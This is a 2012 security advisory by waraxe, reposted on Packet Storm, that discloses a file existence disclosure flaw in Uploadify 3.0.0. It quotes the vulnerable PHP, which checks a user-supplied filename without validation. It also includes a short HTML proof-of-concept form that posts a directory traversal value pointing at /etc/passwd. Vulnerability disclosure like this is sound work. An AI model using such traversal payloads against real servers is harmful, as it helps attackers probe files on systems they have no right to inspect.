Uploadify 3.0.0 File Existence Disclosure

2012-04-06T00:00:00
ID PACKETSTORM:111627
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2012-04-06T00:00:00

Description

                                        
                                            `  
[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 05. April 2012  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-82.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Uploadify is a jQuery plugin that integrates a fully-customizable multiple file  
upload utility on your website. It uses a mixture of Javascript, ActionScript,  
and any server-side language to dynamically create an instance over any DOM  
element on a page.  
  
http://www.uploadify.com/  
  
Vulnerable versions  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected is Uploadify version 3.0.0.  
  
###############################################################################  
1. File Existence Disclosure vulnerability in "uploadify-check-exists.php"  
###############################################################################  
  
Reason: missing input data validation  
Attack vector: user submitted POST parameter "filename"  
Preconditions: none  
Result: attacker can reveal existance of files and directories on remote system  
  
Source code snippet from script "uploadify-check-exists.php":  
-----------------[ source code start ]---------------------------------  
if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) {  
echo 1;  
} else {  
echo 0;  
}  
-----------------[ source code end ]-----------------------------------  
  
We can see, that user submitted POST parameter "filename" is used in argument  
for php function "file_exists()". There is no input data validation, therefore  
attacker can use directory traversal and reveal existence of arbitrary files  
and directories on affected system.  
  
Test:  
-----------------[ PoC code start ]-----------------------------------  
<html><body><center>  
<form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post">  
<input type="hidden" name="filename" value="../../../../../../../../etc/passwd">  
<input type="submit" value="Test">  
</form>  
</center></body></html>  
-----------------[ PoC code start ]-----------------------------------  
  
Result: 1  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
Random project: http://albumnow.com/  
---------------------------------- [ EOF ] ------------------------------------  
`